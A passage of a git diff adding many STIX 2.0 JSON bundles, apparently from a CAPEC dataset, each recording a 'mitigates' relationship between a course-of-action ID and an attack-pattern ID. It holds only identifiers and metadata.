"bundle--2e2fa55a-f39f-476c-920e-78d9f1d1e894", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d04f33ca-24be-46f0-a6a6-06fc33de4b74", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627.json b/capec/relationship/relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627.json new file mode 100644 index 0000000000..7edf397329 --- /dev/null +++ b/capec/relationship/relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--103d6da8-758e-4d02-b556-e99c8f5e2f48", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--81245812-a329-4abe-8817-6159641985fa", + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe.json b/capec/relationship/relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe.json new file mode 100644 index 0000000000..d12c7b7924 --- /dev/null +++ b/capec/relationship/relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a61167d0-4911-4045-868a-1ef7a02be0e6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c473eff9-1c98-4dba-9d3e-16a2ea9ac567", + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dda274ba-4e45-4ee8-8d58-f4416669e11b.json b/capec/relationship/relationship--dda274ba-4e45-4ee8-8d58-f4416669e11b.json new file mode 100644 index 0000000000..ca42a3ea2e --- /dev/null +++ b/capec/relationship/relationship--dda274ba-4e45-4ee8-8d58-f4416669e11b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fddbdfe4-0588-498b-ab38-8055d9bcc23e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dda274ba-4e45-4ee8-8d58-f4416669e11b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf68de8b-26b1-4932-99d2-6222e81dda83", + "target_ref": "attack-pattern--80135864-8689-44e9-8bdb-2c5034a76506", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dea5e196-bc7b-418c-b405-7f8b242151fc.json b/capec/relationship/relationship--dea5e196-bc7b-418c-b405-7f8b242151fc.json new file mode 100644 index 0000000000..2ada57c648 --- /dev/null +++ b/capec/relationship/relationship--dea5e196-bc7b-418c-b405-7f8b242151fc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6e33a061-82cd-445d-8b1b-b1b787815c66", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dea5e196-bc7b-418c-b405-7f8b242151fc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a87fdcab-083e-49ce-a3bd-729fccc5c452", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00.json b/capec/relationship/relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00.json new file mode 100644 index 0000000000..56342f0ede --- /dev/null +++ b/capec/relationship/relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a32212f0-8625-4d9c-998c-86a072f95a16", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", + "target_ref": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff.json b/capec/relationship/relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff.json new file mode 100644 index 0000000000..d0100134b1 --- /dev/null +++ b/capec/relationship/relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--101dd4a4-76f3-4a47-87a6-3dea0155ea6f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--df34685d-a932-4704-9995-216ff7affeab.json b/capec/relationship/relationship--df34685d-a932-4704-9995-216ff7affeab.json new file mode 100644 index 0000000000..a92781fa64 --- /dev/null +++ b/capec/relationship/relationship--df34685d-a932-4704-9995-216ff7affeab.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--738601ee-f639-44ce-b3dd-8e03db04258d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--df34685d-a932-4704-9995-216ff7affeab", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0", + "target_ref": "attack-pattern--eb7ef8dd-05d4-4a86-8188-183c7613740e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--dfdc35bd-a773-482e-b52a-f7bb560b8f97.json b/capec/relationship/relationship--dfdc35bd-a773-482e-b52a-f7bb560b8f97.json new file mode 100644 index 0000000000..6252e07c46 --- /dev/null +++ b/capec/relationship/relationship--dfdc35bd-a773-482e-b52a-f7bb560b8f97.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ce00a1fa-70ec-4252-9587-634a7e38f1f1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--dfdc35bd-a773-482e-b52a-f7bb560b8f97", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e", + "target_ref": "attack-pattern--e025c9dc-4e29-4c77-a39b-1a448ea12445", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e0c29fae-f715-4f15-9b29-78c6871a310b.json b/capec/relationship/relationship--e0c29fae-f715-4f15-9b29-78c6871a310b.json new file mode 100644 index 0000000000..753ceaf801 --- /dev/null +++ b/capec/relationship/relationship--e0c29fae-f715-4f15-9b29-78c6871a310b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f57608e4-e9b7-4d0f-bca2-3c801e1413dc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e0c29fae-f715-4f15-9b29-78c6871a310b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--085071c4-d704-47be-85af-ebcd54320914", + "target_ref": "attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e12c9fb3-9901-43eb-8175-dac851b91921.json b/capec/relationship/relationship--e12c9fb3-9901-43eb-8175-dac851b91921.json new file mode 100644 index 0000000000..bb8617ad80 --- /dev/null +++ b/capec/relationship/relationship--e12c9fb3-9901-43eb-8175-dac851b91921.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--13c999c9-14fb-42b9-b5d0-a850ff7a4cb3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e12c9fb3-9901-43eb-8175-dac851b91921", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dd4d3483-f79a-4e5b-b198-743b20bf8b57", + "target_ref": "attack-pattern--d45dd12b-2a90-40e8-8e17-4e1a5062117c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e17c61dc-f469-462d-9568-39ce472f17a4.json b/capec/relationship/relationship--e17c61dc-f469-462d-9568-39ce472f17a4.json new file mode 100644 index 0000000000..478930d5c0 --- /dev/null +++ b/capec/relationship/relationship--e17c61dc-f469-462d-9568-39ce472f17a4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c164fd48-4fd3-4a3b-a13e-d0a8bd984a23", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e17c61dc-f469-462d-9568-39ce472f17a4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9", + "target_ref": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e18da919-cf74-4285-8858-382596037a0b.json b/capec/relationship/relationship--e18da919-cf74-4285-8858-382596037a0b.json new file mode 100644 index 0000000000..fb52db3145 --- /dev/null +++ b/capec/relationship/relationship--e18da919-cf74-4285-8858-382596037a0b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e549feb5-01fe-4aaa-bfef-3d6d200fc497", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e18da919-cf74-4285-8858-382596037a0b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e6a4c57-5807-4163-b637-6a4aeabc542d", + "target_ref": "attack-pattern--3633a1c0-2af2-4343-b504-4e69c76db60e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8.json b/capec/relationship/relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8.json new file mode 100644 index 0000000000..37d60f9884 --- /dev/null +++ b/capec/relationship/relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dbfb1ebc-a1b0-4363-af20-a1e205bbc6ee", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a53c5e79-8db2-4393-b2e7-ea807fdde618", + "target_ref": "attack-pattern--7b66655f-87f3-4eaa-8f61-ee8e2f23f6b9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e2c89b6f-acd9-4d5d-8774-36cec7da6a5f.json b/capec/relationship/relationship--e2c89b6f-acd9-4d5d-8774-36cec7da6a5f.json new file mode 100644 index 0000000000..4705b677ff --- /dev/null +++ b/capec/relationship/relationship--e2c89b6f-acd9-4d5d-8774-36cec7da6a5f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ab43822b-68ed-447b-afa8-e33bd93030c5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e2c89b6f-acd9-4d5d-8774-36cec7da6a5f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--7e1b1f24-f4a7-4fe3-9679-3d93fe3a4690", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e3437db4-9065-421c-9b17-0a4e607042a2.json b/capec/relationship/relationship--e3437db4-9065-421c-9b17-0a4e607042a2.json new file mode 100644 index 0000000000..b0f0295373 --- /dev/null +++ b/capec/relationship/relationship--e3437db4-9065-421c-9b17-0a4e607042a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8fed2c45-d604-490e-8aa7-2bf6b5446eb2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e3437db4-9065-421c-9b17-0a4e607042a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d0a0571-82ce-49a6-a92d-6213e8fd269e", + "target_ref": "attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d.json b/capec/relationship/relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d.json new file mode 100644 index 0000000000..9c5a8d4bd4 --- /dev/null +++ b/capec/relationship/relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--91f49443-46ce-48d9-a0e3-a588c5acaa34", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bc305995-f9f4-4721-8220-1ac9200eebb4", + "target_ref": "attack-pattern--c0c8edaa-45cb-4b5d-8927-5d34e5c165ee", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1.json b/capec/relationship/relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1.json new file mode 100644 index 0000000000..e3ed79bee2 --- /dev/null +++ b/capec/relationship/relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fa424ff7-852a-490b-92db-c561584fea28", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e87d9d25-d07b-4277-9444-7554d0e36684", + "target_ref": "attack-pattern--263be634-9e77-4c0b-891f-26a625d3b25d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e4059f56-d33f-4125-a86c-21511b62d57a.json b/capec/relationship/relationship--e4059f56-d33f-4125-a86c-21511b62d57a.json new file mode 100644 index 0000000000..3ab54ee10f --- /dev/null +++ b/capec/relationship/relationship--e4059f56-d33f-4125-a86c-21511b62d57a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2f589894-2153-4655-85f9-d4c8a63f86e1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e4059f56-d33f-4125-a86c-21511b62d57a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e46a2581-471f-4b3c-8faa-5bc70e339312.json b/capec/relationship/relationship--e46a2581-471f-4b3c-8faa-5bc70e339312.json new file mode 100644 index 0000000000..07b8659c35 --- /dev/null +++ b/capec/relationship/relationship--e46a2581-471f-4b3c-8faa-5bc70e339312.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--44df18d1-97b2-4799-a72c-ab9522f06e39", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e46a2581-471f-4b3c-8faa-5bc70e339312", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--de575342-7f82-440a-8860-a403ad7a0590", + "target_ref": "attack-pattern--70c66f49-bf61-442f-99a4-8456fce90a8b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e46dedda-2a12-4e24-a23c-ff80c6a382c3.json b/capec/relationship/relationship--e46dedda-2a12-4e24-a23c-ff80c6a382c3.json new file mode 100644 index 0000000000..3ab8915474 --- /dev/null +++ b/capec/relationship/relationship--e46dedda-2a12-4e24-a23c-ff80c6a382c3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--225ecd29-d0b2-438b-929a-5455e55449ca", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e46dedda-2a12-4e24-a23c-ff80c6a382c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c", + "target_ref": "attack-pattern--d39afdc9-d913-4686-a5f8-e4ab56eec66e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d.json b/capec/relationship/relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d.json new file mode 100644 index 0000000000..8e26a950da --- /dev/null +++ b/capec/relationship/relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9426df3a-40df-495c-b6bd-f466a7b9dda1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3", + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e53caf75-e408-4906-8048-06afdbab160f.json b/capec/relationship/relationship--e53caf75-e408-4906-8048-06afdbab160f.json new file mode 100644 index 0000000000..0f61cb1fcf --- /dev/null +++ b/capec/relationship/relationship--e53caf75-e408-4906-8048-06afdbab160f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6c9f8454-0e39-4547-8239-bef198169c05", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e53caf75-e408-4906-8048-06afdbab160f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1b82c7b-b51e-41f7-97a0-2b5aca93652a", + "target_ref": "attack-pattern--d0d56d0e-30ee-4e60-9928-f44945c6e95a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c.json b/capec/relationship/relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c.json new file mode 100644 index 0000000000..e373c04712 --- /dev/null +++ b/capec/relationship/relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d1636f68-79cb-45a0-825a-203886752fdb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9321d2d-a62c-4f97-bac1-3a29e9ed5b43", + "target_ref": "attack-pattern--efcdef38-7fc5-4913-9a35-918becaa621b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3.json b/capec/relationship/relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3.json new file mode 100644 index 0000000000..0f7d228f6b --- /dev/null +++ b/capec/relationship/relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--64c47abd-460b-403e-8c28-1c6ab51dcf6a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a", + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3.json b/capec/relationship/relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3.json new file mode 100644 index 0000000000..b79cb0b743 --- /dev/null +++ b/capec/relationship/relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fc508e51-6801-4b52-865c-92f4ba7be491", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb", + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3.json b/capec/relationship/relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3.json new file mode 100644 index 0000000000..3bc2fb4c89 --- /dev/null +++ b/capec/relationship/relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--24592482-db35-478c-8ee2-75899fca7bbc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227", + "target_ref": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e7276d74-feac-40c8-8ef2-317d1eb3ac80.json b/capec/relationship/relationship--e7276d74-feac-40c8-8ef2-317d1eb3ac80.json new file mode 100644 index 0000000000..d1f455c5d8 --- /dev/null +++ b/capec/relationship/relationship--e7276d74-feac-40c8-8ef2-317d1eb3ac80.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--30e94cfc-919d-40ab-966a-b6a8e2f8f280", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e7276d74-feac-40c8-8ef2-317d1eb3ac80", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a", + "target_ref": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0.json b/capec/relationship/relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0.json new file mode 100644 index 0000000000..37232d3d16 --- /dev/null +++ b/capec/relationship/relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0.json @@ -0,0 +1,20 @@ +{ + "type": 